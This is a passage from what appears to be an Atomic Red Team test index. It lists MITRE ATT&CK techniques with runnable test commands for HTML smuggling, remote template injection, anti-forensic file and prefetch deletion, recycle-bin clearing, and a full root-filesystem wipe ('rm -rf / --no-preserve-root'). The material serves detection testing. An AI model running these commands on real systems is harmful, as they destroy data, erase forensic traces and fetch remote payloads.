authentication environments.(Citation: Dell Skeleton)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
T1027.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb
created: '2021-05-20T12:20:42.219Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/006
external_id: T1027.006
- source_name: Outlflank HTML Smuggling 2018
description: Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved
May 20, 2021.
url: https://outflank.nl/blog/2018/08/14/html-smuggling-explained/
- source_name: MSTIC NOBELIUM May 2021
description: Microsoft Threat Intelligence Center (MSTIC). (2021, May 27).
New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.
url: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
- source_name: HTML Smuggling Menlo Security 2020
description: 'Subramanian, K. (2020, August 18). New HTML Smuggling Attack
Alert: Duri. Retrieved May 20, 2021.'
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
Explorer/Edge. Retrieved September 12, 2024.
url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.501Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stan Hegt, Outflank
- Jonathan Boucher, @crash_wave, Bank of Canada
- Krishnan Subramanian, @krish203
- Vinay Pidathala
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
x_mitre_version: '1.3'
identifier: T1027.006
atomic_tests:
- name: HTML Smuggling Remote Payload
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
without user interaction. \nThe HTML file is based off of the work from [Stan
Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
supported_platforms:
- windows
dependencies:
- description: 'T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
executor:
command: '& "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html"
'
cleanup_command: "$user = [System.Environment]::UserName; Remove-Item -Path
C:\\Users\\$user\\Downloads\\FeelTheBurn.iso -ErrorAction Ignore"
name: powershell
elevation_required: false
T1556.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
created: '2022-01-13T20:02:28.349Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/005
external_id: T1556.005
- source_name: dump_pwd_dcsync
description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
url: https://adsecurity.org/?p=2053
- source_name: store_pwd_rev_enc
description: Microsoft. (2021, October 28). Store passwords using reversible
encryption. Retrieved January 3, 2022.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- source_name: how_pwd_rev_enc_1
description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
encryption: how it works (part 1). Retrieved November 17, 2021.'
url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- source_name: how_pwd_rev_enc_2
description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
encryption: how it works (part 2). Retrieved November 17, 2021.'
url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.587Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters
2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters
3. Global LSA secret (G$MSRADIUSCHAPKEY)
4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1027.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377
created: '2023-03-14T17:36:01.022Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
2024.
url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
url: https://github.com/danielbohannon/Invoke-Obfuscation
- source_name: Invoke-DOSfuscation
description: Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved
March 17, 2023.
url: https://github.com/danielbohannon/Invoke-DOSfuscation
- source_name: FireEye Obfuscation June 2017
description: 'Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild:
Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February
12, 2018.'
url: https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
- source_name: Malware Monday VBE
description: 'Bromiley, M. (2016, December 27). Malware Monday: VBScript and
VBE Files. Retrieved March 17, 2023.'
url: https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16
- source_name: Akamai JS
description: Katz, O. (2020, October 26). Catch Me if You Can—JavaScript Obfuscation.
Retrieved March 17, 2023.
url: https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation
- source_name: Bashfuscator Command Obfuscators
description: LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved
March 17, 2023.
url: https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html
- source_name: Microsoft PowerShellB64
description: 'Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand.
Retrieved March 17, 2023.'
url: https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand
- source_name: RC PowerShell
description: 'Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell.
Retrieved March 17, 2023.'
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:06:13.992Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)
Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)
Tools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- TruKno
- Tim Peck
- George Thomas
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1070.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
created: '2020-01-31T12:35:36.479Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/004
external_id: T1070.004
- source_name: Microsoft SDelete July 2016
description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
8, 2018.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.978Z'
name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows, rm or unlink on Linux and macOS, and `rm` on ESXi.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Walker Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
identifier: T1070.004
atomic_tests:
- name: Delete a single file - FreeBSD/Linux/macOS
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
description: 'Delete a single file from the temporary directory
'
supported_platforms:
- linux
- macos
input_arguments:
parent_folder:
description: Path of parent folder
type: path
default: "/tmp/victim-files/"
file_to_delete:
description: Path of file to delete
type: path
default: "/tmp/victim-files/T1070.004-test.txt"
dependency_executor_name: sh
dependencies:
- description: 'The file must exist in order to be deleted
'
prereq_command: 'test -e #{file_to_delete} && exit 0 || exit 1
'
get_prereq_command: 'mkdir -p #{parent_folder} && touch #{file_to_delete}
'
executor:
command: 'rm -f #{file_to_delete}
'
cleanup_command: 'rm -rf #{parent_folder}
'
name: sh
- name: Delete an entire folder - FreeBSD/Linux/macOS
auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
description: 'Recursively delete the temporary directory and all files contained
within it
'
supported_platforms:
- linux
- macos
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: path
default: "/tmp/victim-folder"
dependency_executor_name: sh
dependencies:
- description: 'The folder must exist in order to be deleted
'
prereq_command: 'test -e #{folder_to_delete} && exit 0 || exit 1
'
get_prereq_command: 'mkdir -p #{folder_to_delete}
'
executor:
command: 'rm -rf #{folder_to_delete}
'
name: sh
- name: Overwrite and delete a file with shred
auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499'
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
'
supported_platforms:
- linux
input_arguments:
file_to_shred:
description: Path of file to shred
type: path
default: "/tmp/victim-shred.txt"
dependencies:
- description: 'Check if file already exists
'
prereq_command: 'if [ -f "#{file_to_shred}" ]; then echo "File already exists";
else echo "File does NOT exist yet"; exit 1; fi
'
get_prereq_command: 'touch #{file_to_shred}
'
executor:
command: 'shred -u #{file_to_shred}
'
name: sh
- name: Delete a single file - Windows cmd
auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
description: |
Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does
not exist.
type: string
default: "%temp%\\deleteme_T1551.004"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
'
prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete}
'
executor:
command: 'del /f #{file_to_delete}
'
name: command_prompt
- name: Delete an entire folder - Windows cmd
auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
description: |
Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it
does not exist.
type: string
default: "%temp%\\deleteme_T1551.004"
dependency_executor_name: command_prompt
dependencies:
- description: 'The file to delete must exist on disk at specified location
(#{folder_to_delete})
'
prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'mkdir #{folder_to_delete}
'
executor:
command: 'rmdir /s /q #{folder_to_delete}
'
name: command_prompt
- name: Delete a single file - Windows PowerShell
auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
description: 'Delete a single file from the temporary directory using Powershell.
Upon execution, no output will be displayed. Use File Explorer to verify the
file was deleted.
'
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: File to delete. Run the prereq command to create it if it does
not exist.
type: string
default: "$env:TEMP\\deleteme_T1551.004"
dependency_executor_name: powershell
dependencies:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
'
prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
'
get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null
'
executor:
command: 'Remove-Item -path #{file_to_delete}
'
name: powershell
- name: Delete an entire folder - Windows PowerShell
auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
description: 'Recursively delete a folder in the temporary directory using Powershell.
Upon execution, no output will be displayed. Use File Explorer to verify the
folder was deleted.
'
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Folder to delete. Run the prereq command to create it if it
does not exist.
type: string
default: "$env:TEMP\\deleteme_folder_T1551.004"
dependency_executor_name: powershell
dependencies:
- description: 'The folder to delete must exist on disk at specified location
(#{folder_to_delete})
'
prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
'
get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
Out-Null
'
executor:
command: 'Remove-Item -Path #{folder_to_delete} -Recurse
'
name: powershell
- name: Delete Filesystem - Linux
auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
description: 'This test deletes the entire root filesystem of a Linux system.
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
'
supported_platforms:
- linux
executor:
command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null
2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
'
name: sh
- name: Delete Prefetch File
auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
description: |
Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run `(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count`
before and after the test to verify that the number of prefetch files decreases by 1.
supported_platforms:
- windows
executor:
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
'
name: powershell
elevation_required: true
- name: Delete TeamViewer Log Files
auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785
description: |
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
supported_platforms:
- windows
input_arguments:
teamviewer_log_file:
description: Teamviewer log file to create and delete.
type: string
default: "$env:TEMP\\TeamViewer_54.log"
executor:
command: |
New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore
name: powershell
- name: Clears Recycle bin via rd
auto_generated_guid: f723d13d-48dc-4317-9990-cf43a9ac0bf2
description: |
An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files.
[Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
supported_platforms:
- windows
executor:
command: 'rd /s /q %systemdrive%\$RECYCLE.BIN
'
name: command_prompt
elevation_required: true
T1221:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534
created: '2018-10-17T00:14:20.652Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1221
external_id: T1221
- source_name: Microsoft Open XML July 2017
description: Microsoft. (2014, July 9). Introducing the Office (2007) Open
XML File Formats. Retrieved July 20, 2018.
url: https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)
- source_name: SANS Brian Wiltse Template Injection
description: Wiltse, B.. (2018, November 7). Template Injection Attacks -
Bypassing Security Controls by Living off the Land. Retrieved April 10,
2019.
url: https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780
- source_name: Redxorblue Remote Template Injection
description: Hawkins, J. (2018, July 18). Executing Macros From a DOCX With
Remote Template Injection. Retrieved October 12, 2018.
url: http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html
- source_name: MalwareBytes Template Injection OCT 2017
description: Segura, J. (2017, October 13). Decoy Microsoft Word document
delivers malware through a RAT. Retrieved July 21, 2018.
url: https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/
- source_name: Proofpoint RTF Injection
description: 'Raggi, M. (2021, December 1). Injection is the New Black: Novel
RTF Template Inject Technique Poised for Widespread Adoption Beyond APT
Actors . Retrieved December 9, 2021.'
url: https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
- source_name: Ciberseguridad Decoding malicious RTF files
description: Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved
November 16, 2021.
url: https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/
- source_name: Anomali Template Injection MAR 2018
description: Intel_Acquisition_Team. (2018, March 1). Credential Harvesting
and Malicious File Delivery using Microsoft Office Template Injection. Retrieved
July 20, 2018.
url: https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104
- source_name: Talos Template Injection July 2017
description: Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure
Leverages Template Injection. Retrieved July 21, 2018.
url: https://blog.talosintelligence.com/2017/07/template-injection.html
- source_name: ryhanson phishery SEPT 2016
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
url: https://github.com/ryhanson/phishery
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:28.862Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Michael Raggi @aRtAGGI
- Brian Wiltse @evalstrings
- Patrick Campbell, @pjcampbe11
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1221
atomic_tests:
- name: WINWORD Remote Template Injection
auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
description: "Open a .docx file that loads a remote .dotm macro enabled template
from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
\nExecutes the code specified within the .dotm template.\nRequires download
of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
\ \nDefault docs file opens Calculator.exe when test sucessfully executed,
while AV turned off.\n"
supported_platforms:
- windows
input_arguments:
docx_file:
description: Location of the test docx file on the local filesystem.
type: path
default: PathToAtomicsFolder\T1221\src\Calculator.docx
executor:
command: 'start "#{docx_file}"
'
name: command_prompt
T1134:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134
external_id: T1134
- source_name: BlackHat Atkinson Winchester Token Manipulation
description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is
No One: Hunting for Token Manipulation. Retrieved December 21, 2017.'
url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: Microsoft LogonUser
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx
- source_name: Microsoft DuplicateTokenEx
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx
- source_name: Microsoft ImpersonateLoggedOnUser
description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017.
url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
- source_name: Pentestlab Token Manipulation
description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April
21, 2017.
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.051Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tom Ueltschi @c_APT_ure
- Travis Smith, Tripwire
- Robby Winchester, @robwinchester3
